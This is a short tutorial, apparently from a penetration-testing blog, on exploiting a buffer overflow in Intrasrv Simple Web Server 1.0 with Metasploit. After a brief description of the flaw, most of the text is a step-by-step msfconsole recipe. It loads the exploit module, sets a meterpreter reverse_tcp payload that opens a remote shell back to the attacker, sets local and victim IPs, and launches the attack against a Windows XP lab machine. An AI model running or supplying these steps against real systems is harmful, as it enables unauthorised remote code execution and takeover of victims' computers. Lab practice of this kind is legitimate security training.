This module exploits a boundary condition error in Intrasrv Simple Web Server 1.0. The web interface does not validate the boundaries of an HTTP request string prior to copying the data to an insufficiently large buffer. Successful exploitation leads to arbitrary remote code execution in the context of the application.
Exploit Targets
Simple Web Server 1.0
Requirement
Attacker: Kali Linux
Victim PC: Windows XP SP 3
Open Kali Linux terminal type msfconsole
Now type use exploit/windows/http/intrastv_bof
msf exploit (intrastv_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (intrastv_bof)>set lhost 192.168.1.5 (IP of Local Host)
msf exploit (intrastv_bof)>set rhost 192.168.1.3 (IP of Victim PC)
msf exploit (intrastv_bof)>exploit
